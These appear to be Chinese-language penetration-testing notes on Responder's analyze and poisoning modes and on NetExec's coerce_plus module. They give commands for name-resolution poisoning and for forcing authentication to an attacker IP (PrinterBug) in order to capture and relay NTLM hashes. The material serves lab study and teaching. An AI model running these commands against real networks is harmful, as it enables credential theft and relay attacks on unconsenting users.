Responder

Responder 是一款 LLMNR 、 NBT-NS 和 MDNS 投毒器,内置支持 NTLMv1/NTLMv2/LMv2、扩展安全 NTLMSSP 及基本 HTTP 身份验证的 HTTP/SMB/MSSQL/FTP/LDAP 伪造认证服务器。也可以用于“分析”模式。

  • BROWSER 模式:分析浏览服务(Browse Service)消息,并将 IP 地址与 NetBIOS 名称进行映射。
  • LANMAN 模式:被动地通过浏览器协议(Browser protocol)映射域控制器、服务器和加入域的工作站(详见 Trustwave 的《Responder 2.0 - Owning Windows Networks part 3》)。
  • LLMNR、NBTNS、MDNS 模式:分析广播和组播的名称解析请求。

以下命令可以启用分析模式,并获取如下有价值的信息:

  • 域控制器、SQL 服务器、工作站等主机信息- 完全限定域名(FQDN)
  • 使用中的 Windows 版本
  • 各种协议(如 LLMNR、NBTNS、MDNS、LANMAN、BROWSER)的“启用”或“禁用”状态
responder --interface "eth0" --analyze
responder -I "eth0" -A

常用于在 NTLMRelay 中进行捕获hash
907e2afe01794f6417a512c8e9efcec9_MD5
Scan for Vulnerabilities | NetExec

nxc smb ip  -u user -p pass -k -M coerce_plus #检查
nxc smb ip  -u user -p pass -k -M coerce_plus -o L=10.10.14.69 M=PrinterBug #认证

1. 分析模式

Responder提供了-A参数,意为analyze模式,这个模式下我们不会响应任何的NBT-NS 、 browser 或 LLMNR 请求,主要做监听侦察,人们往往错误的输入主机名、url等,我们可以使用此点来进行中继攻击

我们可以使用下面的操作做一个测试

#开启监听模式
responder -I eth0 -v -A

Pasted image 20260310214004.png
然后可以收到我们的

Pasted image 20260310214248.png

我们也可以去掉-A选项,此时Responder将响应广播流量并毒化响应,使用户尝试对我们的攻击机进行身份验证